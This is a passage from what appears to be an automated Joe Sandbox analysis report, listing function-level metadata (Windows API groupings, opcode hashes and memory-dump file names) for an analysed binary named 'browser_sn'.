                                                      • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                      • String ID: SeShutdownPrivilege
                                                      • API String ID: 337752880-3733053543
                                                      • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                      • Instruction ID: 663f6effaa627af740615ec695980ba01aacbfe8d95bad5eadc0110a24f1fe2e
                                                      • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                      • Instruction Fuzzy Hash: 12113A71A28A4286E764EB30F8593AAF3B0FF84744F805035E68E46B94DF7CE049CB10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$RectVisible$Foreground
                                                      • String ID:
                                                      • API String ID: 2499709836-0
                                                      • Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                      • Instruction ID: 6cb6f9efad4fa937dd2ef5818cc745fe70b67a989df56ea0658b94d9a7836ded
                                                      • Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                      • Instruction Fuzzy Hash: B8D19D36B24A928EEB24DFB9D4406EC77B6BB48B48B445139DE0E67B88DE34E441C750
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3778485334-0
                                                      • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                      • Instruction ID: ff48442f1502b7b807b369a460474ebc46870c00cbfe468e380c5825c3768405
                                                      • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                      • Instruction Fuzzy Hash: 2631D03992CB4286E760AB74E8503A9B7B4FB85394F806135DA8E427A4DF7CF044CB20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                      • String ID: SeShutdownPrivilege
                                                      • API String ID: 1314775590-3733053543
                                                      • Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                      • Instruction ID: a403fc1666b18fcf283b31084b541cc57f755fb83013b39eedb11cdd61a683fd
                                                      • Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                      • Instruction Fuzzy Hash: F9011B71A29A8281E760EB30F8552AAF3B1FF89754F906035E64E47764DE3DE049CB10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
                                                      • String ID:
                                                      • API String ID: 1870958493-0
                                                      • Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                      • Instruction ID: 08eae58d7d1a4cbdc553c233dea40b286fc3318ed392d45935da2514c18e8a6d
                                                      • Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                      • Instruction Fuzzy Hash: BE714933F241024FE738AB349A626FCA696AF52348F948135DF0996BD9DF38F5058611
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
                                                      • String ID:
                                                      • API String ID: 2715784024-0
                                                      • Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                      • Instruction ID: b53d80a3805e497c562fa6ab10cebf0bca9d28c96e7e3c528c2184d3b6dc15fd
                                                      • Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                      • Instruction Fuzzy Hash: A0018015A3CA4282FA346B3568182B9E2F5BF46BE5F482134DD2E477D4DE2CF444C220
                                                      APIs
                                                        • Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB
                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87C09
                                                        • Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722
                                                        • Part of subcall function 00007FF790C878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C8792E
                                                        • Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8796A
                                                        • Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C879B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                      • String ID: UseRegistry$admin$group1
                                                      • API String ID: 1728753321-252764636
                                                      • Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                      • Instruction ID: e81d16cec07ae53bd9f50dba4053d6b1f61e1392b1f9da8e5615eb97576c718f
                                                      • Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
                                                      • Instruction Fuzzy Hash: CC11FE21A3858281EA70FB30F4913E9A361FF99744FC01135DA4D46BA6DE3CF554C620
                                                      APIs
                                                        • Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB
                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87CC9
                                                        • Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722
                                                        • Part of subcall function 00007FF790C878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C8792E
                                                        • Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8796A
                                                        • Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C879B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                      • String ID: UseRegistry$admin$group2
                                                      • API String ID: 1728753321-2518265958
                                                      • Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                      • Instruction ID: adaea2a3f8eeb54bde2bf8bba2c0f5f22e8d982a4ad5550062f206716df7f5ba
                                                      • Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
                                                      • Instruction Fuzzy Hash: E011FA32A2858281EA70FB30E4613F9A360FF8A744FC01135DA4D467A6DE3CF555CA20
                                                      APIs
                                                        • Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB
                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87D89
                                                        • Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722
                                                        • Part of subcall function 00007FF790C878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C8792E
                                                        • Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8796A
                                                        • Part of subcall function 00007FF790C878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C879B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                      • String ID: UseRegistry$admin$group3
                                                      • API String ID: 1728753321-3776872688
                                                      • Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                      • Instruction ID: af84b2585c02d83cf6000ef1e58cd0bf0e5776e84aeed8793cbb447f9eac796f
                                                      • Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                      • Instruction Fuzzy Hash: EC110932A2898291EA71FB30F4613F9A360FF8A744FC01136DA4D467A2DE3CF554CA20
                                                      APIs
                                                        • Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB
                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87E50
                                                        • Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722
                                                        • Part of subcall function 00007FF790C877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87840
                                                        • Part of subcall function 00007FF790C877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8787D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                      • String ID: UseRegistry$admin$locdom1
                                                      • API String ID: 1788981264-2648182776
                                                      • Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                      • Instruction ID: d7f56fb879502e94facec5d410068b4ebbeb7f171d83f19dcd7ffaa30c16a592
                                                      • Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                      • Instruction Fuzzy Hash: 2E011A21A3894391FB71FB34E8913F5A2A1EF5A704FC02135D91D46792EE3CF588C620
                                                      APIs
                                                        • Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB
                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87EED
                                                        • Part of subcall function 00007FF790C87650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87689
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C876DD
                                                        • Part of subcall function 00007FF790C87650: RegCreateKeyExA.ADVAPI32 ref: 00007FF790C87722
                                                        • Part of subcall function 00007FF790C877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C87840
                                                        • Part of subcall function 00007FF790C877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF790C8787D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                      • String ID: UseRegistry$admin$locdom2
                                                      • API String ID: 1788981264-80830018
                                                      • Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                      • Instruction ID: f2c16a4e771f53f065996a3a96a2e132a1175a6dea4d89f7fb97aaa0866ff4d0
                                                      • Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                      • Instruction Fuzzy Hash: B5011E21A3854281FA71FB75A4953F5A3A1EF9A304FC11531DA1D46792EE3CF189C624
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFindMode$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2885216544-0
                                                      • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                      • Instruction ID: bab2e28bf0915bcb662115c526f1a381412711421322abc098de11a5d6ff574a
                                                      • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                      • Instruction Fuzzy Hash: 9B012535B1878586DA309B31B8542B9E3B1FB8DBE0F805231DE6E43794CE3DE8458B10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 1f8284c9b81bc00274cff331346e792dc04ed1df2d7324caccb88a26b9367104
